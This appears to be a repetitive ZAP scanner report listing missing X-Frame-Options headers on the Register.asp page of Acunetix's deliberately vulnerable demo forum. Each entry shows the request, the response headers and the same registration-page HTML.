URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> 